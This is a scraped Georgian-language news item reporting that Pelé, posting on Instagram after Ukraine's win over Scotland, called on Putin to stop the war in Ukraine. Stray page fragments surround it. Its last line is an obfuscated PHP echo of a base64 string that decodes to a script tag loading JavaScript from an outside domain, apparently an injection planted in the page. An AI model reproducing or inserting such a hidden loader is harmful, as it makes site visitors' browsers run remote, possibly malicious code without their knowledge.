celsiusi
ავერსი საქკაბელი
ლეგენდარულმა ბრაზილიელმა ფეხბურთელმა პელემ რუსეთის პრეზიდენტ ვლადიმირ პუტინს მიმართა და მოუწოდა, შეწყვიტოს სამხედრო მოქმედებები უკრაინაში. მიმართვა პელემ უკრაინის საფეხბურთო ნაკრების მიერ შოტლანდიის დამარცხების შემდეგ „ინსტაგრამზე“ გამოაქვეყნა.
 
მისივე თქმით, ეს კონფლიქტი არის საშინელი, გაუმართლებელი და არაფერი მოაქვს, გარდა ტკივილის, შიშისა და სიძულვილისა.
 
„დღეს უკრაინა ცდილობდა, თუნდაც 90 წუთით მაინც დაევიწყებინა ტრაგედია, რომელითაც ეს ქვეყანაა მოცული.
 
შეაჩერეთ შეჭრა. არ არსებობს აბსოლუტურად არავითარი მიზეზი ამ ძალადობის გასაგრძელებლად. ეს კონფლიქტი არის საშინელი, გაუმართლებელი და არაფერი მოაქვს, გარდა ტკივილის, შიშისა და სიძულვილისა. ამის შეწყვეტის შესაძლებლობა თქვენს ხელშია“, – წერს პელე.
803
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");